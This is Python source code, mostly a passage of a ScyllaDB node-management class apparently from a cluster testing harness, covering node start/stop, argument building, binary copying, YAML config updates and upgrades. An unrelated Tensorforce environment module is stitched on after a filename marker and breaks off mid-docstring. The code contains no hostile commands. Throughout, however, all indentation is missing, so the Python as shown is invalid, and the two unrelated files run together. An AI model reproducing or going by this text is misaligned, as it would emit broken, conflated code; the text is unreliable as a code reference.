SCYLLA_EXT_OPTS environment variable.
Extra environment variables for running scylla can be passed using the
SCYLLA_EXT_ENV environment variable.
Those are represented in a single string comprised of one or more
pairs of "var=value" separated by either space or semicolon (';')
"""
if wait_for_binary_proto is None:
wait_for_binary_proto = self.cluster.force_wait_for_cluster_start and not no_wait
if wait_other_notice is None:
wait_other_notice = self.cluster.force_wait_for_cluster_start and not no_wait
if jvm_args is None:
jvm_args = []
scylla_cassandra_mapping = {'-Dcassandra.replace_address_first_boot':
'--replace-address-first-boot'}
# Replace args in the form
# ['-Dcassandra.foo=bar'] to ['-Dcassandra.foo', 'bar']
translated_args = []
new_jvm_args = []
for jvm_arg in jvm_args:
if '=' in jvm_arg:
split_option = jvm_arg.split("=")
e_msg = ("Option %s not in the form '-Dcassandra.foo=bar'. "
"Please check your test" % jvm_arg)
assert len(split_option) == 2, e_msg
option, value = split_option
# If we have information on how to translate the jvm option,
# translate it
if option in scylla_cassandra_mapping:
translated_args += [scylla_cassandra_mapping[option],
value]
# Otherwise, just pass it as is
else:
new_jvm_args.append(jvm_arg)
else:
new_jvm_args.append(jvm_arg)
jvm_args = new_jvm_args
if self.is_running():
raise NodeError("%s is already running" % self.name)
if not self.is_docker():
for itf in list(self.network_interfaces.values()):
if itf is not None and replace_address is None:
try:
common.check_socket_available(itf)
except Exception as msg:
print("{}. Looking for offending processes...".format(msg))
for proc in psutil.process_iter():
if any(self.cluster.ipprefix in cmd for cmd in proc.cmdline()):
print("name={} pid={} cmdline={}".format(proc.name(), proc.pid, proc.cmdline()))
raise msg
marks = []
if wait_other_notice:
marks = [(node, node.mark_log()) for node in
list(self.cluster.nodes.values()) if node.is_live()]
self.mark = self.mark_log()
launch_bin = common.join_bin(self.get_path(), BIN_DIR, 'scylla')
options_file = os.path.join(self.get_path(), 'conf', 'scylla.yaml')
# TODO: we do not support forcing specific settings
# TODO: workaround for api-address as we do not load it
# from config file scylla#59
conf_file = os.path.join(self.get_conf_dir(), common.SCYLLA_CONF)
with open(conf_file, 'r') as f:
data = yaml.safe_load(f)
jvm_args = jvm_args + ['--api-address', data['api_address']]
jvm_args = jvm_args + ['--collectd-hostname',
'%s.%s' % (socket.gethostname(), self.name)]
# Let's add jvm_args and the translated args
args = [launch_bin, '--options-file', options_file, '--log-to-stdout', '1'] + jvm_args + translated_args
# Lets search for default overrides in SCYLLA_EXT_OPTS
scylla_ext_opts = os.getenv('SCYLLA_EXT_OPTS', "").split()
opts_i = 0
orig_args = list(args)
while opts_i < len(scylla_ext_opts):
if scylla_ext_opts[opts_i].startswith("--scylla-manager="):
opts_i += 1
elif scylla_ext_opts[opts_i].startswith('-'):
o = scylla_ext_opts[opts_i]
opts_i += 1
if '=' in o:
opt = o.replace('=', ' ', 1).split()
else:
opt = [ o ]
while opts_i < len(scylla_ext_opts) and not scylla_ext_opts[opts_i].startswith('-'):
opt.append(scylla_ext_opts[opts_i])
opts_i += 1
if opt[0] not in orig_args:
args.extend(opt)
if '--developer-mode' not in args:
args += ['--developer-mode', 'true']
if '--smp' not in args:
# If --smp is not passed from cmdline, use default (--smp 1)
args += ['--smp', str(self._smp)]
elif self._smp_set_during_test:
# If node.set_smp() is called during the test, ignore the --smp
# passed from the cmdline.
args[args.index('--smp') + 1] = str(self._smp)
else:
# Update self._smp based on command line parameter.
# It may be used below, along with self._mem_mb_per_cpu, for calculating --memory
self._smp = int(args[args.index('--smp') + 1])
if '--memory' not in args:
# If --memory is not passed from cmdline, use default (512M per cpu)
args += ['--memory', '{}M'.format(self._mem_mb_per_cpu * self._smp)]
elif self._mem_set_during_test:
# If node.set_mem_mb_per_cpu() is called during the test, ignore the --memory
# passed from the cmdline.
args[args.index('--memory') + 1] = '{}M'.format(self._mem_mb_per_cpu * self._smp)
if '--default-log-level' not in args:
args += ['--default-log-level', self.__global_log_level]
if self.scylla_mode() == 'debug' and '--blocked-reactor-notify-ms' not in args:
args += ['--blocked-reactor-notify-ms', '5000']
# TODO add support for classes_log_level
if '--collectd' not in args:
args += ['--collectd', '0']
if '--cpuset' not in args:
args += ['--overprovisioned']
if '--prometheus-address' not in args:
args += ['--prometheus-address', data['api_address']]
if replace_address:
args += ['--replace-address', replace_address]
args += ['--unsafe-bypass-fsync', '1']
# The '--kernel-page-cache' was introduced by
# https://github.com/scylladb/scylla/commit/8785dd62cb740522d80eb12f8272081f85be9b7e from 4.5 version
current_node_version = self.node_install_dir_version
if current_node_version and LooseVersion('666.development') < LooseVersion(current_node_version) >= LooseVersion('4.5'):
args += ['--kernel-page-cache', '1']
ext_env = {}
scylla_ext_env = os.getenv('SCYLLA_EXT_ENV', "").strip()
if scylla_ext_env:
scylla_ext_env = re.split(r'[; ]', scylla_ext_env)
for s in scylla_ext_env:
try:
[k, v] = s.split('=', 1)
except ValueError as e:
print("Bad SCYLLA_EXT_ENV variable: {}: {}", s, e)
else:
ext_env[k] = v
message = "Starting scylla: args={} wait_other_notice={} wait_for_binary_proto={}".format(args, wait_other_notice, wait_for_binary_proto)
self.debug(message)
scylla_process = self._start_scylla(args, marks, update_pid,
wait_other_notice,
wait_for_binary_proto,
ext_env)
self._start_jmx(data)
ip_addr, _ = self.network_interfaces['thrift']
jmx_port = int(self.jmx_port)
if not self._wait_java_up(ip_addr, jmx_port):
e_msg = "Error starting node {}: unable to connect to scylla-jmx port {}:{}".format(
self.name, ip_addr, jmx_port)
raise NodeError(e_msg, scylla_process)
self.is_running()
if self.scylla_manager and self.scylla_manager.is_agent_available:
self.start_scylla_manager_agent()
return scylla_process
def start_dse(self,
join_ring=True,
no_wait=False,
verbose=False,
update_pid=True,
wait_other_notice=False,
replace_token=None,
replace_address=None,
jvm_args=None,
wait_for_binary_proto=False,
profile_options=None,
use_jna=False):
"""
Start the node. Options includes:
- join_ring: if false, start the node with -Dcassandra.join_ring=False
- no_wait: by default, this method returns when the node is started
and listening to clients.
If no_wait=True, the method returns sooner.
- wait_other_notice: if True, this method returns only when all other
live node of the cluster have marked this node UP.
- replace_token: start the node with the -Dcassandra.replace_token
option.
- replace_address: start the node with the
-Dcassandra.replace_address option.
"""
if jvm_args is None:
jvm_args = []
raise NotImplementedError('ScyllaNode.start_dse')
def _update_jmx_pid(self, wait=True):
pidfile = os.path.join(self.get_path(), 'scylla-jmx.pid')
start = time.time()
while not (os.path.isfile(pidfile) and os.stat(pidfile).st_size > 0):
elapsed = time.time() - start
if elapsed > 30.0 or not wait:
if wait:
print_("Timed out waiting for pidfile {} to be filled (after {} seconds): File {} size={}".format(
pidfile,
elapsed,
'exists' if os.path.isfile(pidfile) else 'does not exist' if not os.path.exists(pidfile) else 'is not a file',
os.stat(pidfile).st_size if os.path.exists(pidfile) else -1))
break
else:
time.sleep(0.1)
if os.path.isfile(pidfile) and os.stat(pidfile).st_size > 0:
try:
with open(pidfile, 'r') as f:
self.jmx_pid = int(f.readline().strip())
except IOError as e:
raise NodeError('Problem starting node %s scylla-jmx due to %s' %
(self.name, e))
else:
self.jmx_pid = None
def nodetool(self, *args, **kwargs):
"""
Kill scylla-jmx in case of timeout, to supply enough debugging information
"""
try:
return super().nodetool(*args, **kwargs)
except subprocess.TimeoutExpired:
self.error("nodetool timeout, going to kill scylla-jmx with SIGQUIT")
self.kill_jmx(signal.SIGQUIT)
time.sleep(5) # give the java process time to print the threaddump into the log
raise
def kill_jmx(self, __signal):
if self.jmx_pid:
os.kill(self.jmx_pid, __signal)
def _update_scylla_agent_pid(self):
pidfile = os.path.join(self.get_path(), 'scylla-agent.pid')
start = time.time()
while not (os.path.isfile(pidfile) and os.stat(pidfile).st_size > 0):
if time.time() - start > 30.0:
print_("Timed out waiting for pidfile {} to be filled (current time is %s): File {} size={}".format(
pidfile,
datetime.now(),
'exists' if os.path.isfile(pidfile) else 'does not exist' if not os.path.exists(pidfile) else 'is not a file',
os.stat(pidfile).st_size if os.path.exists(pidfile) else -1))
break
else:
time.sleep(0.1)
try:
with open(pidfile, 'r') as f:
self.agent_pid = int(f.readline().strip())
except IOError as e:
raise NodeError('Problem starting node %s scylla-agent due to %s' %
(self.name, e))
def do_stop(self, gently=True):
"""
Stop the node.
- gently: Let Scylla and Scylla JMX clean up and shut down properly.
Otherwise do a 'kill -9' which shuts down faster.
"""
did_stop = False
self._update_jmx_pid(wait=False)
if self.scylla_manager and self.scylla_manager.is_agent_available:
self._update_scylla_agent_pid()
for proc in [self._process_jmx, self._process_scylla, self._process_agent]:
if proc:
did_stop = True
if gently:
try:
proc.terminate()
except OSError:
pass
else:
try:
proc.kill()
except OSError:
pass
else:
signal_mapping = {True: signal.SIGTERM, False: signal.SIGKILL}
for pid in [self.jmx_pid, self.pid, self.agent_pid]:
if pid:
did_stop = True
try:
os.kill(pid, signal_mapping[gently])
except OSError:
pass
return did_stop
def _wait_until_stopped(self, wait_seconds):
start_time = time.time()
wait_time_sec = 1
while True:
if not self.is_running():
return True
elapsed = time.time() - start_time
if elapsed >= wait_seconds:
return False
time.sleep(wait_time_sec)
if elapsed + wait_time_sec > wait_seconds:
wait_time_sec = wait_seconds - elapsed
elif wait_time_sec <= 16:
wait_time_sec *= 2
def wait_until_stopped(self, wait_seconds=None, marks=[], dump_core=True):
"""
Wait until node is stopped after do_stop was called.
- wait_other_notice: return only when the other live nodes of the
cluster have marked this node has dead.
- marks: optional list of (node, mark) to call watch_log_for_death on.
"""
if wait_seconds is None:
wait_seconds = 127 if self.scylla_mode() != 'debug' else 600
start = time.time()
if self.is_running():
if not self._wait_until_stopped(wait_seconds):
if dump_core and self.pid:
# Aborting is intended to generate a core dump
# so the reason the node didn't stop normally can be studied.
self.warning("{} is still running after {} seconds. Trying to generate coredump using kill({}, SIGQUIT)...".format(
self.name, wait_seconds, self.pid))
try:
os.kill(self.pid, signal.SIGQUIT)
except OSError:
pass
self._wait_until_stopped(300)
if self.is_running() and self.pid:
self.warning("{} is still running after {} seconds. Killing process using kill({}, SIGKILL)...".format(
self.name, wait_seconds, self.pid))
os.kill(self.pid, signal.SIGKILL)
self._wait_until_stopped(10)
while self.jmx_pid and time.time() - start < wait_seconds:
try:
os.kill(self.jmx_pid, 0)
time.sleep(1)
except OSError:
self.jmx_pid = None
pass
if self.jmx_pid:
try:
self.warning("{} scylla-jmx is still running. Killing process using kill({}, SIGKILL)...".format(
self.name, wait_seconds, self.jmx_pid))
os.kill(self.jmx_pid, signal.SIGKILL)
except OSError:
pass
if self.is_running():
raise NodeError("Problem stopping node %s" % self.name)
for node, mark in marks:
if node != self:
node.watch_log_for_death(self, from_mark=mark)
def stop(self, wait=True, wait_other_notice=False, other_nodes=None, gently=True, wait_seconds=None, marks=[]):
"""
Stop the node.
- wait: if True (the default), wait for the Scylla process to be
really dead. Otherwise return after having sent the kill signal.
stop() will wait up to wait_seconds, by default 127 seconds
(or 600 in debug mode), for the Scylla process to stop gracefully.
After this wait, it will try to kill the node using SIGQUIT,
and if that failed, it will throw an
exception stating it couldn't stop the node.
- wait_other_notice: return only when the other live nodes of the
cluster have marked this node has dead.
- other_nodes: optional list of nodes to apply wait_other_notice on.
- marks: optional list of (node, mark) to call watch_log_for_death on.
- gently: Let Scylla and Scylla JMX clean up and shut down properly.
Otherwise do a 'kill -9' which shuts down faster.
"""
was_running = self.is_running()
if was_running:
if wait_other_notice:
if not other_nodes:
other_nodes = list(self.cluster.nodes.values())
if not marks:
marks = [(node, node.mark_log()) for node in
other_nodes if
node.is_live() and node is not self]
self.do_stop(gently=gently)
if wait or wait_other_notice:
self.wait_until_stopped(wait_seconds, marks, dump_core=gently)
return was_running
def import_config_files(self):
# TODO: override node - enable logging
self._create_directory()
self._update_config()
self.copy_config_files()
self.update_yaml()
self.__copy_logback_files()
def copy_config_files(self):
Node.copy_config_files(self)
conf_pattern = os.path.join(self.get_tools_java_dir(), 'conf', "jvm*.options")
for filename in glob.glob(conf_pattern):
if os.path.isfile(filename):
shutil.copy(filename, self.get_conf_dir())
def get_tools_java_dir(self):
return common.get_tools_java_dir(self.node_install_dir)
def get_jmx_dir(self, relative_repos_root):
return os.environ.get('SCYLLA_JMX_DIR', os.path.join(self.node_install_dir, relative_repos_root, 'scylla-jmx'))
def __copy_logback_files(self):
shutil.copy(os.path.join(self.get_tools_java_dir(), 'conf', 'logback-tools.xml'),
os.path.join(self.get_conf_dir(), 'logback-tools.xml'))
def import_dse_config_files(self):
raise NotImplementedError('ScyllaNode.import_dse_config_files')
def copy_config_files_dse(self):
raise NotImplementedError('ScyllaNode.copy_config_files_dse')
def clean_runtime_file(self):
"""Remove cassandra.in.sh file that created runtime during cluster build """
cassandra_in_sh = os.path.join(self.get_node_cassandra_root(), BIN_DIR, CASSANDRA_SH)
if os.path.exists(cassandra_in_sh):
os.remove(cassandra_in_sh)
def hard_link_or_copy(self, src, dst, extra_perms=0, always_copy=False, replace=False):
def do_copy(src, dst, extra_perms=0):
shutil.copy(src, dst)
os.chmod(dst, os.stat(src).st_mode | extra_perms)
if always_copy:
return do_copy(src, dst, extra_perms)
if os.path.exists(dst) and replace:
os.remove(dst)
try:
os.link(src, dst)
except OSError as oserror:
if oserror.errno == errno.EXDEV or oserror.errno == errno.EMLINK:
do_copy(src, dst, extra_perms)
else:
raise RuntimeError("Unable to create hard link from %s to %s: %s" % (src, dst, oserror))
def _copy_binaries(self, files, src_path, dest_path, exist_ok=False, replace=False, extra_perms=0):
os.makedirs(dest_path, exist_ok=exist_ok)
for name in files:
self.hard_link_or_copy(src=os.path.join(src_path, name),
dst=os.path.join(dest_path, name),
extra_perms=extra_perms,
replace=replace)
def import_bin_files(self, exist_ok=False, replace=False):
# selectively copying files to reduce risk of using unintended items
self._copy_binaries(files=[CASSANDRA_SH, 'nodetool'],
src_path=os.path.join(self.get_tools_java_dir(), BIN_DIR),
dest_path=os.path.join(self.get_path(), 'resources', 'cassandra', BIN_DIR),
exist_ok=exist_ok,
replace=replace
)
# selectively copying files to reduce risk of using unintended items
# Copy sstable tools
self._copy_binaries(files=['sstabledump', 'sstablelevelreset', 'sstablemetadata',
'sstablerepairedset', 'sstablesplit'],
src_path=os.path.join(self.get_tools_java_dir(), 'tools', BIN_DIR),
dest_path=os.path.join(self.get_path(), 'resources', 'cassandra', 'tools', BIN_DIR),
exist_ok=exist_ok,
replace=replace
)
# TODO: - currently no scripts only executable - copying exec
if self.is_scylla_reloc():
relative_repos_root = '../..'
self.hard_link_or_copy(src=os.path.join(self.node_install_dir, BIN_DIR, 'scylla'),
dst=os.path.join(self.get_bin_dir(), 'scylla'),
extra_perms=stat.S_IEXEC,
replace=replace)
os.environ['GNUTLS_SYSTEM_PRIORITY_FILE'] = os.path.join(self.node_install_dir, 'scylla-core-package/libreloc/gnutls.config')
else:
relative_repos_root = '..'
src = os.path.join(self.get_install_dir(), 'build', self.scylla_mode(), 'scylla')
dst = os.path.join(self.get_bin_dir(), 'scylla')
dbuild_so_dir = os.environ.get('SCYLLA_DBUILD_SO_DIR')
if not dbuild_so_dir:
self.hard_link_or_copy(src, dst, stat.S_IEXEC)
else:
self.hard_link_or_copy(src, dst, stat.S_IEXEC, always_copy=True)
search_pattern = os.path.join(dbuild_so_dir, 'ld-linux-x86-64.so.*')
res = glob.glob(search_pattern)
if not res:
raise RuntimeError('{} not found'.format(search_pattern))
if len(res) > 1:
raise RuntimeError('{}: found too make matches: {}'.format(search_pattern, res))
loader = res[0]
self._launch_env = dict(os.environ)
self._launch_env['LD_LIBRARY_PATH'] = dbuild_so_dir
patchelf_cmd = [loader, os.path.join(dbuild_so_dir, 'patchelf'), '--set-interpreter', loader, dst]
def run_patchelf(patchelf_cmd):
p = subprocess.Popen(patchelf_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=self._launch_env)
(stdout, stderr) = p.communicate()
return (p.returncode, stdout, stderr)
(returncode, stdout, stderr) = run_patchelf(patchelf_cmd)
if returncode != 0:
# Retry after stripping binary if hit
# https://github.com/scylladb/scylla/issues/5245
if stderr == 'read\n':
cmd = ['strip', dst]
subprocess.check_call(cmd)
(returncode, stdout, stderr) = run_patchelf(patchelf_cmd)
if returncode != 0:
raise RuntimeError('{} exited with status {}.\nstdout:{}\nstderr:\n{}'.format(patchelf_cmd, returncode, stdout, stderr))
if 'scylla-repository' in self.node_install_dir:
self.hard_link_or_copy(os.path.join(self.node_install_dir, 'scylla-jmx', 'scylla-jmx-1.0.jar'),
os.path.join(self.get_bin_dir(), 'scylla-jmx-1.0.jar'), replace=replace)
self.hard_link_or_copy(os.path.join(self.node_install_dir, 'scylla-jmx', 'scylla-jmx'),
os.path.join(self.get_bin_dir(), 'scylla-jmx'), replace=replace)
else:
self.hard_link_or_copy(os.path.join(self.get_jmx_dir(relative_repos_root), 'target', 'scylla-jmx-1.0.jar'),
os.path.join(self.get_bin_dir(), 'scylla-jmx-1.0.jar'))
self.hard_link_or_copy(os.path.join(self.get_jmx_dir(relative_repos_root), 'scripts', 'scylla-jmx'),
os.path.join(self.get_bin_dir(), 'scylla-jmx'))
os.makedirs(os.path.join(self.get_bin_dir(), 'symlinks'), exist_ok=exist_ok)
scylla_jmx_file = os.path.join(self.get_bin_dir(), 'symlinks', 'scylla-jmx')
if os.path.exists(scylla_jmx_file) and replace:
os.remove(scylla_jmx_file)
os.symlink('/usr/bin/java', scylla_jmx_file)
parent_dir = os.path.dirname(os.path.realpath(__file__))
resources_bin_dir = os.path.join(parent_dir, 'resources', BIN_DIR)
for name in os.listdir(resources_bin_dir):
filename = os.path.join(resources_bin_dir, name)
if os.path.isfile(filename):
shutil.copy(filename, self.get_bin_dir())
common.add_exec_permission(self.get_bin_dir(), name)
def _save(self):
# TODO: - overwrite node
self.update_yaml()
self._update_config()
def update_yaml(self):
# TODO: copied from node.py
conf_file = os.path.join(self.get_conf_dir(), common.SCYLLA_CONF)
with open(conf_file, 'r') as f:
data = yaml.safe_load(f)
data['cluster_name'] = self.cluster.name
data['auto_bootstrap'] = self.auto_bootstrap
data['initial_token'] = self.initial_token
if (not self.cluster.use_vnodes and
self.get_base_cassandra_version() >= 1.2):
data['num_tokens'] = 1
if 'seeds' in data:
# cassandra 0.7
data['seeds'] = self.cluster.get_seeds()
else:
# cassandra 0.8
data['seed_provider'][0]['parameters'][0]['seeds'] = (
','.join(self.cluster.get_seeds()))
data['listen_address'], data['storage_port'] = (
self.network_interfaces['storage'])
data['rpc_address'], data['rpc_port'] = (
self.network_interfaces['thrift'])
if (self.network_interfaces['binary'] is not None and
self.get_base_cassandra_version() >= 1.2):
_, data['native_transport_port'] = self.network_interfaces['binary']
data['data_file_directories'] = [os.path.join(self.get_path(), 'data')]
data['commitlog_directory'] = os.path.join(self.get_path(),
'commitlogs')
data['hints_directory'] = os.path.join(self.get_path(), 'hints')
data['saved_caches_directory'] = os.path.join(self.get_path(),
'saved_caches')
data['view_hints_directory'] = os.path.join(self.get_path(), 'view_hints')
if self.cluster.partitioner:
data['partitioner'] = self.cluster.partitioner
# TODO: add scylla options
data['api_address'] = data['listen_address']
# last win and we want node options to win
full_options = dict(list(self.cluster._config_options.items()) +
list(self.get_config_options().items()))
for name in full_options:
value = full_options[name]
if value is None:
try:
del data[name]
except KeyError:
# it is fine to remove a key not there:w
pass
else:
try:
if isinstance(data[name], dict):
for option in full_options[name]:
data[name][option] = full_options[name][option]
else:
data[name] = full_options[name]
except KeyError:
data[name] = full_options[name]
if 'alternator_port' in data or 'alternator_https_port' in data:
data['alternator_address'] = data['listen_address']
with open(conf_file, 'w') as f:
yaml.safe_dump(data, f, default_flow_style=False)
# TODO: - for now create a cassandra conf file leaving only
# cassandra config items - this should be removed once tools are
# updated to remove scylla conf and use a shrunk version
cassandra_conf_file = os.path.join(self.get_conf_dir(),
common.CASSANDRA_CONF)
cassandra_conf_items = {'authenticator': 0,
'authorizer': 0,
'auto_snapshot': 0,
'batch_size_warn_threshold_in_kb': 0,
'batchlog_replay_throttle_in_kb': 0,
'broadcast_address': 0,
'broadcast_rpc_address': 0,
'cas_contention_timeout_in_ms': 0,
'client_encryption_options': 0,
'cluster_name': 0,
'column_index_size_in_kb': 0,
'commit_failure_policy': 0,
'commitlog_directory': 0,
'commitlog_segment_size_in_mb': 0,
'commitlog_sync': 0,
'commitlog_sync_batch_window_in_ms': 0,
'commitlog_sync_period_in_ms': 0,
'commitlog_total_space_in_mb': 0,
'compaction_large_partition_warning_threshold_mb': 0,
'compaction_throughput_mb_per_sec': 0,
'concurrent_compactors': 0,
'concurrent_counter_writes': 0,
'concurrent_reads': 0,
'concurrent_writes': 0,
'counter_cache_keys_to_save': 0,
'counter_cache_save_period': 0,
'counter_cache_size_in_mb': 0,
'counter_write_request_timeout_in_ms': 0,
'cross_node_timeout': 0,
'data_file_directories': 0,
'disk_failure_policy': 0,
'dynamic_snitch_badness_threshold': 0,
'dynamic_snitch_reset_interval_in_ms': 0,
'dynamic_snitch_update_interval_in_ms': 0,
'endpoint_snitch': 0,
'file_cache_size_in_mb': 0,
'hinted_handoff_enabled': 0,
'hinted_handoff_throttle_in_kb': 0,
'incremental_backups': 0,
'index_summary_capacity_in_mb': 0,
'index_summary_resize_interval_in_minutes': 0,
'inter_dc_stream_throughput_outbound_megabits_per_sec': 0,
'inter_dc_tcp_nodelay': 0,
'internode_authenticator': 0,
'internode_compression': 0,
'key_cache_keys_to_save': 0,
'key_cache_save_period': 0,
'key_cache_size_in_mb': 0,
'listen_address': 0,
'listen_interface': 0,
'listen_interface_prefer_ipv6': 0,
'max_hint_window_in_ms': 0,
'max_hints_delivery_threads': 0,
'memory_allocator': 0,
'memtable_allocation_type': 0,
'memtable_cleanup_threshold': 0,
'memtable_flush_writers': 0,
'memtable_heap_space_in_mb': 0,
'memtable_offheap_space_in_mb': 0,
'native_transport_max_concurrent_connections': 0,
'native_transport_max_concurrent_connections_per_ip': 0,
'native_transport_max_frame_size_in_mb': 0,
'native_transport_max_threads': 0,
'native_transport_port': 0,
'num_tokens': 0,
'partitioner': 0,
'permissions_validity_in_ms': 0,
'phi_convict_threshold': 0,
'range_request_timeout_in_ms': 0,
'read_request_timeout_in_ms': 0,
'request_scheduler': 0,
'request_scheduler_id': 0,
'request_scheduler_options': 0,
'request_timeout_in_ms': 0,
'row_cache_keys_to_save': 0,
'row_cache_save_period': 0,
'row_cache_size_in_mb': 0,
'rpc_address': 0,
'rpc_interface': 0,
'rpc_interface_prefer_ipv6': 0,
'rpc_keepalive': 0,
'rpc_max_threads': 0,
'rpc_min_threads': 0,
'rpc_port': 0,
'rpc_recv_buff_size_in_bytes': 0,
'rpc_send_buff_size_in_bytes': 0,
'rpc_server_type': 0,
'seed_provider': 0,
'server_encryption_options': 0,
'snapshot_before_compaction': 0,
'ssl_storage_port': 0,
'sstable_preemptive_open_interval_in_mb': 0,
'start_native_transport': 0,
'start_rpc': 0,
'storage_port': 0,
'stream_throughput_outbound_megabits_per_sec': 0,
'streaming_socket_timeout_in_ms': 0,
'thrift_framed_transport_size_in_mb': 0,
'tombstone_failure_threshold': 0,
'tombstone_warn_threshold': 0,
'trickle_fsync': 0,
'trickle_fsync_interval_in_kb': 0,
'truncate_request_timeout_in_ms': 0,
'write_request_timeout_in_ms': 0}
cassandra_data = {}
for key in data:
if key in cassandra_conf_items:
cassandra_data[key] = data[key]
with open(cassandra_conf_file, 'w') as f:
yaml.safe_dump(cassandra_data, f, default_flow_style=False)
def __update_yaml_dse(self):
raise NotImplementedError('ScyllaNode.__update_yaml_dse')
def _update_log4j(self):
raise NotImplementedError('ScyllaNode._update_log4j')
def __generate_server_xml(self):
raise NotImplementedError('ScyllaNode.__generate_server_xml')
def _get_directories(self):
dirs = {}
for i in ['data', 'commitlogs', BIN_DIR, 'conf', 'logs', 'hints', 'view_hints']:
dirs[i] = os.path.join(self.get_path(), i)
return dirs
def _copy_agent(self):
raise NotImplementedError('ScyllaNode._copy_agent')
def _start_agent(self):
raise NotImplementedError('ScyllaNode._start_agent')
def _stop_agent(self):
raise NotImplementedError('ScyllaNode._stop_agent')
def _write_agent_address_yaml(self, agent_dir):
raise NotImplementedError('ScyllaNode._write_agent_address_yaml')
def _write_agent_log4j_properties(self, agent_dir):
raise NotImplementedError('ScyllaNode._write_agent_log4j_properties')
def _wait_no_pending_flushes(self, wait_timeout=60):
def no_pending_flushes():
stdout, _ = self.nodetool('cfstats', timeout=wait_timeout)
pending_flushes = False
for line in stdout.splitlines():
line = line.strip()
if line.startswith('Pending flushes'):
_, pending_flushes_str = line.split(':')
pending_flushes_count = int(pending_flushes_str.strip())
if pending_flushes_count > 0:
pending_flushes = True
return not pending_flushes
result = wait_for(no_pending_flushes, timeout=wait_timeout, step=1.0)
if result is None:
raise NodeError("Node %s still has pending flushes after "
"%s seconds" % (self.name, wait_timeout))
def flush(self):
self.nodetool("flush")
self._wait_no_pending_flushes()
def get_node_scylla_version(self, scylla_exec_path=None):
if not scylla_exec_path:
scylla_exec_path = self.get_path()
if not scylla_exec_path.endswith(BIN_DIR):
scylla_exec_path = os.path.join(scylla_exec_path, BIN_DIR)
scylla_exec = os.path.join(scylla_exec_path, 'scylla')
scylla_version = subprocess.run(f"{scylla_exec} --version", shell=True, capture_output=True, text=True)
if scylla_version.returncode:
raise NodeError("Failed to get Scylla version. Error:\n%s" % scylla_version.stderr)
return scylla_version.stdout.strip()
def upgrade(self, upgrade_to_version):
self.upgrader.upgrade(upgrade_version=upgrade_to_version)
class NodeUpgrader:
"""
Upgrade node is supported when uses relocatable packages only
"""
def __init__(self, node: ScyllaNode):
"""
:param node: node that should be upgraded/downgraded
"""
self.node = node
self._scylla_version_for_upgrade = None
self.orig_install_dir = node.node_install_dir
self.install_dir_for_upgrade = None
@property
def scylla_version_for_upgrade(self):
return self._scylla_version_for_upgrade
@scylla_version_for_upgrade.setter
def scylla_version_for_upgrade(self, scylla_version_for_upgrade: str):
"""
:param scylla_version_for_upgrade: relocatables name. Example: unstable/master:2020-11-18T08:57:53Z
"""
self._scylla_version_for_upgrade = scylla_version_for_upgrade
def _setup_relocatable_packages(self):
try:
cdir, _ = setup(self.scylla_version_for_upgrade)
except Exception as exc:
raise NodeUpgradeError("Failed to setup relocatable packages. %s" % exc)
return cdir
def _import_executables(self, install_dir):
try:
self.node.node_install_dir = install_dir
self.node.import_bin_files(exist_ok=True, replace=True)
except Exception as exc:
self.node.node_install_dir = self.orig_install_dir
raise NodeUpgradeError("Failed to import executables files. %s" % exc)
def upgrade(self, upgrade_version: str):
"""
:param upgrade_version: relocatables folder. Example: unstable/master:2020-11-18T08:57:53Z
"""
self.scylla_version_for_upgrade = upgrade_version
cdir = self._setup_relocatable_packages()
self.node.stop(wait_other_notice=True)
if self.node.status != Status.DOWN:
raise NodeUpgradeError("Node %s failed to stop before upgrade" % self.node.name)
self._import_executables(cdir)
self.node.clean_runtime_file()
try:
self.node.start(wait_other_notice=True, wait_for_binary_proto=True)
except Exception as exc:
raise NodeUpgradeError("Node %s failed to start after upgrade. Error: %s" % (self.node.name, exc))
if self.node.status != Status.UP:
self.node.node_install_dir = self.orig_install_dir
raise NodeUpgradeError("Node %s failed to start after upgrade" % self.node.name)
self.install_dir_for_upgrade = cdir
self.node.node_scylla_version = self.install_dir_for_upgrade
self.validate_version_after_upgrade()
self.node.upgraded = True
def validate_version_after_upgrade(self):
expected_version = self.node.get_node_scylla_version(self.install_dir_for_upgrade)
if self.node.node_scylla_version != expected_version:
raise NodeUpgradeError("Node hasn't been upgraded. Expected version after upgrade: %s, Got: %s" % (
expected_version, self.node.node_scylla_version))
|
environment.py
|
# Copyright 2018 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import importlib
import json
import os
from threading import Thread
from tensorforce import TensorforceError, util
import tensorforce.environments
class Environment(object):
"""
Tensorforce environment interface.
"""
@staticmethod
def create(environment, **kwargs):
"""
Creates an environment from a specification.
Args:
environment (specification): JSON file, specification key, configuration dictionary,
library module, or `Environment` subclass
(<span style="color:#C00000"><b>required</b></span>).
kwargs: Additional arguments.
"""
if isinstance(environment, Environment):
# TODO: asserts???????
return environment
elif isinstance(environment, dict):
# Dictionary specification
util.deep_disjoint_update(target=kwargs, source=environment)
environment = kwargs.pop('environment', kwargs.pop('type', 'default'))
assert environment is not None
return Environment.create(environment=environment, **kwargs)
elif isinstance(environment, str):
if os.path.isfile(environment):
# JSON file specification
with open(environment, 'r') as fp:
environment = json.load(fp=fp)
util.deep_disjoint_update(target=kwargs, source=environment)
environment = kwargs.pop('environment', kwargs.pop('type', 'default'))
assert environment is not None
return Environment.create(environment=environment, **kwargs)
elif '.' in environment:
# Library specification
library_name, module_name = environment.rsplit('.', 1)
library = importlib.import_module(name=library_name)
environment = getattr(library, module_name)
environment = environment(**kwargs)
assert isinstance(environment, Environment)
return environment
else:
# Keyword specification
environment = tensorforce.environments.environments[environment](**kwargs)
assert isinstance(environment, Environment)
return environment
else:
assert False
def __init__(self):
# first two arguments, if applicable: level, visualize=False
self.observation = None
self.thread = None
def __str__(self):
return self.__class__.__name__
def states(self):
"""
Returns the state space specification.
Returns:
specification: Arbitrarily nested dictionary of state descriptions with the following
attributes:
<ul>
<li><b>type</b> (<i>"bool" | "int" | "float"</i>) – state data type
(<span style="color:#00C000"><b>default</b></span>: "float").</li>
<li><b>shape</b> (<i>int | iter[int]</i>) – state shape
(<span style="color:#C00000"><b>required</b></span>).</li>
<li><b>num_states</b> (<i>int > 0</i>) – number of discrete state values
